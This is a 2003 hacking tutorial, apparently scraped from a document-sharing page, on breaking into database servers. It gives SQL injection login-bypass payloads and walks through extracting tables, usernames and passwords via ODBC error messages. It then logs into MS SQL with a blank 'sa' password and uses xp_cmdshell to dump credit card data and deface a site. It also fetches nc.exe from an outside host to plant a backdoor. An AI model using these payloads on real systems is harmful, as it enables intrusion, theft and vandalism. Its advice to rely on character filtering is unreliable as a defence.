Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Hacking Database Servers

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 7
At a glance
Powered by AI
The article discusses how improperly configured web applications can expose database servers to attacks, and how SQL injection vulnerabilities can be exploited to gain unauthorized access.

The article discusses how SQL injection attacks can be used to bypass authentication by manipulating query strings. It provides an example using boolean operators to always evaluate a condition as true.

SQL injection is discussed as a method for bypassing authentication by appending SQL code to login credentials to manipulate the query string.

Hacking Database Servers !

@ Articles -> Security May 06 2003, 20:23 (UTC+0)

chesschintan writes:

Databases have been the heart of a commercial website. An attack on the database servers can
cause a great monetary loss for the company. Database servers are usually hacked to get the
credit card information. And just one hack on a commercial site will bring down its reputation and
also the customers as they also want their credit card info secured. Most of the commercial
websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market
because the price is very low. While Oracle servers come with high price. Well some time ago
Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of
bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided
to share the knowledge with others. Well the things discussed here are not discovered by me ok.
Yeah I experimented with them a lot.

The article is divided into two parts:


1. Using the HTTP port 80
2. Using the MS SQL port 1434

Part I – Using HTTP port 80 ( Or better would be malformed URLs)


----------------------------------------------------------------

This part will be useful not only to the hackers but also to the web designers. A common mistake
made by the web designers can reveal the databases of the server to the hacker. Lets see on it.
The whole game is of query strings. So it is assumed that the reader has some knowledge about
queries and asp. And one more thing. This hack is done using only through the browser. So you
even don't require any other tools except IE or Netscape.
Normally, inorder to make a login page, the web designer will write the following code.

login.htm

<html>
<body>
<form method=get action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>

logincheck.asp

<@language="vbscript">
<%
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")

set conn = Server.CreateObject("ADODB.Connection")


conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folde
r\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "'
",conn
If rs.EOF
response.write("Login failed")
else
response.write("Login successful")
End if
%>

Looking at the above code at first site it seems OK. A user will type his login name and password in
login.htm page and click the submit button. The value of the text boxes will be passed to the
logincheck.asp page where it will be checked using the query string. If it doesn't get an entry
satisfying the query and will reach end of file a message of login failed will be displayed. Every
thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the
query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully
without knowing the password. How ? Lets look at the querry again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will
pass to the asp page with post method and then the above query will become

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so
we will receive a message as login successful. Now what if I type loginname as "Chintan" and
password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness
of hacker which was due to carelessness of web designer ? !!
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to
'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker
is in with login "Chintan" !! You can try the following in the password text box if the above doesn't
work for some websites:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be
checked. Similary you can provide

Chintan ' --
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might
let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored
due to --. Well if you are lucky enough you get such a website were the webdesigner has done the
above mistake and then you will be able to login as any user !!!

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the sql
injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm

More advance hacking of Databases using ODBC error messages!!!


--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show
you how to read the whole database just by using queries in the URL !! And this works only for IIS
i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely
get a victim just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if
you don't understand then as we have seen in the above example in the login.htm, having two input
text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp
page. The same thing can be done by directly opening the logincheck.asp page using
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values
passed to next paged in the url while get method shows up the values. To get more understanding
of how they internally work read HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are
assigned the values. As above login_name is given value Chintan. And different variables are
separated by operator '&'.

OK so coming back, id will mostly be hidden type and according to the links you click its value will
change. This value of id is then passed in the query in mypage.asp page and according tothe
results you get the desired page at your screen. Now if just change the value of id as 46 then you
will get different page.
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM


INFORMATION_SCHEMA.TABLES--

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all


the tables of the server. In that there is field TABLE_NAME which contains names of all the tables.
See the query again
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But
the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer)
by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server
Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type
int. /mypage.asp, line

From the error its clear that first table is 'logintable'. It seems that this table might contain login
names and passwords :-) So lets move in it. Type the following in the URL
http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--

output
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the
next column name will type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM


INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE
COLUMN_NAME NOT IN ('login_id')--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM


INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE
COLUMN_NAME NOT IN ('login_id','login_name')--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'


[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM


logintable--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable


where login_name='Rahul'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)


-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was
done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that
we will see what actually database servers are and how do they work and then how to exploit
them !

The designers of MS sql gave some default stored procedures along with the product to make
things flexible to the webdesigners. The procedure is nothing but functions which can used to
perform some actions on the arguments passed to them. This procedures are very important to
hackers. Some of the important ones are

sp_passsword -> Changes password for a specific login name.


e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database.


e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)

xp_msver -> Shows the MS SQL server version including the all info about the OS.
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.

xp_regdeletevalue ->Delets a registry value

xp_regread -> Reads a registry value

xp_regwrite -> Writes a registry key.

xp_terminate_process -> Stops a process

Well these are some important procedures. Actually there are more than 50 such types of
procedures. If you want your MS SQL server to be protected then I would recommend to delete all
of these procedures. The trick is open the Master database using MS SQL Server Enterprise
Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by
right click and delete.

Note: “Master” is an important database of the SQL server which contains all system information
like login names and system stored procedures. So if a hacker deletes this master database then
the SQL server will be down for ever. Syslogins is the default system table which contains the
usernames and passwords of logins in the database.
Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank
“”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability
had been released.

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port
scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp)
open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose
we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there
are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also
use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt
and type.

C:>osql.exe -?
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifier
s]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
<EOF> batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type

C:\> osql.exe –S 198.188.178.1 –U sa –P “”


1>
Thats what we get if we login successfully else we will get an error message as login failed for user
“sa”

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell”
default stored procedure.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”

I would prefer to use –Q option instead of –q because it exits after executing the query. In the same
manner we can execute any command on the remote machine. We can even upload or download
any files on/from the remote machine. A smart attacker will install a backdoor on the machine to
gain access to in future also. Now as I had explained earlier we can use the
“information_schema.tables” to get the list of tables and contents of it.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”

And getting table names look for some table like login or accounts or users or something like that
which seems to contain some important info like credit card no. etc.
C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”

And

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”

Output:

Username creditcard expdate


----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in index.html file ?

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by


Chintan > C:\inetpub\wwwroot\index.html’”

Wanna upload any file on the remote system.

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12


GET nc.exe c:\nc.exe’”

And to download any file we can use the PUT request instead of GET Its just because this
commands are being executed on the remote machine and not on ours. So if you give the GET
request the command will be executed on the remote machine and it will try to get the nc.exe file
from our machine to the remote machine.

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the
web. Even many buffer overflows are being discovered which can allow user to gain the complete
control of the sytem with administrator privileges. The article is just giving some general issues
about database servers.

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three
known vulnerabilities in the SQL servers using 1433/1434 UDP ports.

Precautionay measures
---------------------------

<*> Change the default password for sa.


<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewa
lls.

Remember security is not an add-on feature. It depends upon the smartness of administrator. The
war between the hacker and administrator will go on and on and on…. The person who is aware
with the latest news or bug reports will win the war. Database admins should keep in touch with
some sites like

You might also like